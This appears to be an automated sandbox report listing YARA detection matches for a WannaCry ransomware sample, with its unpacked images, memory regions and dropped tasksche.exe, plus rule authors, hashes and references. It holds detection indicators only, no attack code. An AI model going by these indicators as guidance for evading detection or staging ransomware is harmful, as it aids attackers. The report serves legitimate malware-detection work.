            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.25248e8.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.25248e8.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000002.00000000.311420520.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000000.00000000.305025447.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000001.00000000.308511699.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000001.00000002.576523594.0000000001FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: e0R5qxY8Vj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.1ff20a4.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.1ff20a4.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
